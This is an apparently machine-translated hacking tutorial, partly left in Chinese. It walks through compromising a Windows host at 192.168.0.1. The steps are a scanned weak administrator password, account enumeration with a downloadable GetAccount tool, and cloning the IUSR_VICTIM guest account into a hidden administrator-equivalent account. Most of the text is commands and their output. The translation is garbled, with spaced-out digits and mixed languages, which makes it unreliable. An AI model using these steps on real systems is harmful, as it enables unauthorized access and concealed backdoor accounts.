The steps of:
1, assuming that we pass the scanner to get a 1 9 2. 1 6 8. 0. 1 on a user test password for the test belonging to the administrators group.
2, Using the GetAccount http://www.lsky.org/download/GetAccount.exe 获得 系统 中 已经 存在 的 帐号 信息 of course the use of empty connections are also possible.
C:\>getaccount \\192.168.0.1 1
GetAccount Via SID, by netXeyes 2002/04/06
Connect To Host 192.168.0.1.... OK
Start Ememurate Account....
Name is: TsInternetUser Name is: NetShowServices Name is: NetShow Administrators Name is: IUSR_VICTIM Name is: IWAM_VICTIM Name is: zjf Name is: DHCP Users Name is: DHCP Administrators
Disconnect The Host 192.168.0.1.... OK
3, the 利用 SA.exe the Iusr_victim clone as Administrator.
C:\>ca \\192.168.0.1 test test iusr_victim password Clone the Administrator, by netXeyes 2002/04/06 Written by netXeyes 2 0 0 2, email@example.com
Connect 192.168.0.1.... OK Get the SID of iusr_victim.... OK Prepairing.... OK Processing.... OK Clean Up.... OK
In this case, iusr_victim become a super user, and there is having the and Administrator the same settings(Desktop, menu, etc.
In the 1 9 2. 1 6 8. 0. 1 above with the Net command to view the results:
User name IUSR_VICTIM Full Name Internet Guest Account Comment Built-in account for anonymous access to Internet I nFORMation Services User's comment Built-in account for anonymous access to Internet I nFORMation Services Country code 0 0 0 (System Default) Account active Yes Account expires Never
Password last set 2002/4/28 PM 1 0:3 1 Password expires Never Password changeable 2002/4/28 PM 1 0:3 1 Password required Yes User may change password No
Workstations allowed All Logon script User profile Home directory Last logon 2002/4/28 PM 0 9:0 2
Logon hours allowed All
Local Group Memberships Guests Global Group memberships None